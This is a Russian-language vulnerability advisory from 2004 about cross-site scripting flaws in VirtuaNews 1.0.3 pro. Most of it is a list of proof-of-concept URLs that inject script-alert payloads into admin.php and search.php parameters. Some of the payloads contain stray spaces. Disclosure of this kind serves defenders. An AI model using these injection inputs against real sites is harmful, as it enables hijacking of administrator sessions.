Межсайтовый скриптинг в VirtuaNews

Дата публикации:
07.03.2004
Всего просмотров:
1100
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
VirtuaNews 1.x
Уязвимые версии: VirtuaNews 1.0.3 pro

Описание: Уязвимость в проверке правильности входных данных обнаружена в VirtuaNews. Удаленный пользователь может выполнить XSS нападение.

 
http://<host>/admin.php?"><script>alert('XSS')</script>

http://< host>/forum/search.php?do=process&showposts=0&query=<script>alert('XSS')
</script>

http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~ "></textarea>
<script>alert('XSS')</script>

http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea>
--><script>alert('XSS')</s cript>

http://<host>/admin.php?">action=vulns_add&catid=SELECT&title=
~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')</script>

http://<host>/admin.php?act ion=files&expand=">
<script>alert('XSS')</script>

http://<host>/admin.php?action=files_cat_delete&id=">
<script>alert('XSS')</script>

http://<host>/admin.php?action=f iles_check&catid=">
<script>alert('XSS')</script>

http://<host>/admin.php?action=newslogo_upload&">
<script>alert('XSS')</script>

URL производителя: http://www.virtuanews.co.uk/

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: VirtuaNews Admin Panel 1.0.3 Pro Cross Site Scripting Vulnerabillity

или введите имя

CAPTCHA